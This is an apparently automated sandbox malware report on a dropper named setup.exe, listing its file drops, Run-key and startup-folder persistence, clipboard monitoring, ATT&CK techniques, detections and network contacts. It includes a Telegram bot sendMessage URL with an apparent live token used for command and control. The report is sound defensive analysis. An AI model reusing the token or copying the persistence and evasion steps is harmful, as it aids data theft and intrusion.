        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AA2C5C CreateEventW,CreateNamedPipeW,3_2_00007FF669AA2C5C
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ACFFF0 GetCurrentProcess,SetUserObjectInformationW,GetCommandLineW,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF669ACFFF0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB4224 GetVersionExW,3_2_00007FF669AB4224
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_004058A0 AddClipboardFormatListener,DestroyWindow,GetLastError,DestroyWindow,WaitForSingleObject,PeekMessageA,TranslateMessage,DispatchMessageA,Sleep,RemoveClipboardFormatListener,DestroyWindow,ReleaseMutex,10_2_004058A0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_004058A0 AddClipboardFormatListener,DestroyWindow,GetLastError,DestroyWindow,WaitForSingleObject,PeekMessageA,TranslateMessage,DispatchMessageA,Sleep,RemoveClipboardFormatListener,DestroyWindow,ReleaseMutex,18_2_004058A0

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid Accounts12
        Native API        		1
        Scripting        		1
        Exploitation for Privilege Escalation        		11
        Deobfuscate/Decode Files or Information        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Web Service        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts12
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		3
        Obfuscated Files or Information        		LSASS Memory3
        File and Directory Discovery        		Remote Desktop Protocol3
        Clipboard Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell        		121
        Registry Run Keys / Startup Folder        		13
        Process Injection        		12
        Software Packing        		Security Account Manager44
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive11
        Encrypted Channel        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook121
        Registry Run Keys / Startup Folder        		1
        DLL Side-Loading        		NTDS54
        Security Software Discovery        		Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
        Masquerading        		LSA Secrets2
        Process Discovery        		SSHKeylogging14
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
        Virtualization/Sandbox Evasion        		Cached Domain Credentials251
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
        Process Injection        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        System Network Configuration Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579562 Sample: setup.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 78 api.telegram.org 2->78 80 api.ipify.org 2->80 84 Antivirus detection for dropped file 2->84 86 Antivirus / Scanner detection for submitted sample 2->86 88 Multi AV Scanner detection for dropped file 2->88 92 11 other signatures 2->92 10 setup.exe 4 2->10         started        14 svchost.exe 2->14         started        16 svchost.exe 2->16         started        signatures3 90 Uses the Telegram API (likely for C&C communication) 78->90 process4 dnsIp5 66 C:\Users\user\AppData\Local\Temp\tg.exe, PE32 10->66 dropped 68 C:\Users\user\AppData\Local\...\svchost.exe, PE32+ 10->68 dropped 70 C:\Users\user\AppData\Local\Temp\client.exe, PE32 10->70 dropped 114 Encrypted powershell cmdline option found 10->114 116 Drops PE files with benign system names 10->116 19 svchost.exe 1 9 10->19         started        23 tg.exe 8 10->23         started        25 powershell.exe 23 10->25         started        27 client.exe 10->27         started        118 Hides threads from debuggers 14->118 74 127.0.0.1 unknown unknown 16->74 file6 signatures7 process8 file9 62 C:\ProgramData\Microsoft\...\svchost.exe, PE32 19->62 dropped 94 Machine Learning detection for dropped file 19->94 96 Drops PE files to the startup folder 19->96 98 Drops PE files with benign system names 19->98 29 svchost.exe 1 2 19->29         started        64 C:\Users\user\AppData\Local\Temp\...\1BBC.bat, ASCII 23->64 dropped 100 Multi AV Scanner detection for dropped file 23->100 102 Detected unpacking (overwrites its own PE header) 23->102 33 cmd.exe 2 23->33         started        104 Loading BitLocker PowerShell Module 25->104 35 WmiPrvSE.exe 25->35         started        37 conhost.exe 25->37         started        signatures10 process11 file12 72 C:\ProgramData\svchost\svchost.exe, PE32 29->72 dropped 120 Hides threads from debuggers 29->120 39 svchost.exe 29->39         started        42 cmd.exe 33->42         started        44 cmd.exe 1 33->44         started        46 cmd.exe 33->46         started        48 4 other processes 33->48 signatures13 process14 dnsIp15 106 Antivirus detection for dropped file 39->106 108 Multi AV Scanner detection for dropped file 39->108 110 Found evasive API chain (may stop execution after checking mutex) 39->110 112 3 other signatures 39->112 51 powershell.exe 42->51         started        54 powershell.exe 15 44->54         started        56 powershell.exe 46->56         started        76 api.telegram.org 149.154.167.220, 443, 49734 TELEGRAMRU United Kingdom 48->76 58 powershell.exe 48->58         started        60 powershell.exe 48->60         started        signatures16 process17 dnsIp18 82 api.ipify.org 104.26.13.205, 443, 49730 CLOUDFLARENETUS United States 51->82

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        setup.exe61%VirustotalBrowse
        setup.exe63%ReversingLabsWin32.Dropper.Dapato
        setup.exe100%AviraHEUR/AGEN.1355885

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe100%AviraTR/Crypt.XPACK.Gen
        C:\ProgramData\svchost\svchost.exe100%AviraTR/Crypt.XPACK.Gen
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\tg.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\svchost.exe100%Joe Sandbox ML
        C:\ProgramData\svchost\svchost.exe100%Joe Sandbox ML
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe63%ReversingLabsWin32.Trojan.MintSneaky
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe69%VirustotalBrowse
        C:\ProgramData\svchost\svchost.exe63%ReversingLabsWin32.Trojan.MintSneaky
        C:\ProgramData\svchost\svchost.exe69%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\tg.exe24%ReversingLabsWin32.Trojan.Generic

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        api.ipify.org
        		104.26.13.205
        		truefalse
          		high
          api.telegram.org
          		149.154.167.220
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessagefalse
              		high
              https://api.ipify.org/?format=textfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                149.154.167.220
                		api.telegram.orgUnited Kingdom
                		62041TELEGRAMRUfalse
                104.26.13.205
                		api.ipify.orgUnited States
                		13335CLOUDFLARENETUSfalse

                Private

                IP
                127.0.0.1

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1579562
                Start date and time:2024-12-23 01:04:13 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 17s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:28
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:setup.exe
                Detection:MAL
                Classification:mal100.troj.adwa.spyw.evad.winEXE@42/28@2/3
                EGA Information:
                • Successful, ratio: 87.5%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 205
                • Number of non-executed functions: 205
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 1396 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                00:05:09AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\ProgramData\svchost\svchost.exe" --run
                19:05:09API Interceptor86x Sleep call for process: powershell.exe modified
                19:05:17API Interceptor3252972x Sleep call for process: svchost.exe modified
                19:05:53API Interceptor7257216x Sleep call for process: tg.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                149.154.167.220file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                  user.exeGet hashmaliciousUnknownBrowse
                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                        8v1GZ8v1LF.exeGet hashmaliciousUnknownBrowse
                          HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                            file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                              2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                  c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                    104.26.13.205BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                    • api.ipify.org/
                                    lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                    • api.ipify.org/
                                    Simple1.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousRDPWrap ToolBrowse
                                    • api.ipify.org/
                                    Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                    • api.ipify.org/

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    api.ipify.orgQUOTATION#008792.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.13.205
                                    c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                    • 172.67.74.152
                                    billys.exeGet hashmaliciousMeduza StealerBrowse
                                    • 172.67.74.152
                                    ruppert.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 104.26.13.205
                                    DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.13.205
                                    4089137200.exeGet hashmaliciousAgentTeslaBrowse
                                    • 172.67.74.152
                                    iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 104.26.12.205
                                    script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 104.26.12.205
                                    script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 104.26.12.205
                                    api.telegram.orgfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 149.154.167.220
                                    user.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                    • 149.154.167.220
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                    • 149.154.167.220
                                    8v1GZ8v1LF.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                    • 149.154.167.220
                                    2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 149.154.167.220
                                    c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    TELEGRAMRUAmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                    • 149.154.167.99
                                    GoldenContinent.exeGet hashmaliciousVidarBrowse
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 149.154.167.220
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    user.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                    • 149.154.167.220
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                    • 149.154.167.220
                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                    • 149.154.167.99
                                    8v1GZ8v1LF.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    CLOUDFLARENETUSAmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
